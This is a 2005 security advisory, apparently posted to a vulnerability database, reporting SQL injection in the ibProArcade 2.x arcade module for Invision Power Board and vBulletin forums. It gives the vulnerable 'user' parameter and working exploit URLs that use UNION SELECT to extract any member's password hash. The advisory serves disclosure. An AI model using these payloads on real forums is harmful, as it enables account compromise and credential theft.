Security Advisory: Sql injection in ibProArcade - security vulnerabilities database

[EN] securityvulns.ru
no-pyccku

Related information
  Web applications security vulnerabilities (PHP, ASP, CGI, Perl, etc)
  [SA17537] Dev-Editor Virtual Root Directory Restriction Bypass
  [SA17470] OcoMon Unspecified SQL Injection Vulnerabilities
  [Full-disclosure] phpBB 2.0.18 SQL Query problem
  [SA17441] phpSysInfo "register_global
s" Emulation Layer Overwrite Vulnerability

From: bhfh01_(at)_gmail.com <bhfh01_(at)_gmail.com>
Date: 07.11.2005
Subject: Sql injection in ibProArcade

Sql injection in ibProArcade.
#############################

This bug was discoverd in all of the versions of ibproarcade 2.x.
It was tested and found perfectly working under vBulettin or Invision power board.
Date:2005-11-5

The injection is here:
module=report&user=[userid]
Query: 'SELECT name FROM ibf_members WHERE id=[userid]'

Exploit:
IPB:
index.php?act=Arcade&module=report&user=-1 union select password from ibf_members where id=[any_user]
vBulettin forums:
index.php?act=ibProArcade&module=report&user=-1 union select password from user where userid=[any_user]

Thankyou , B~HFH
bhfh01@gmail.com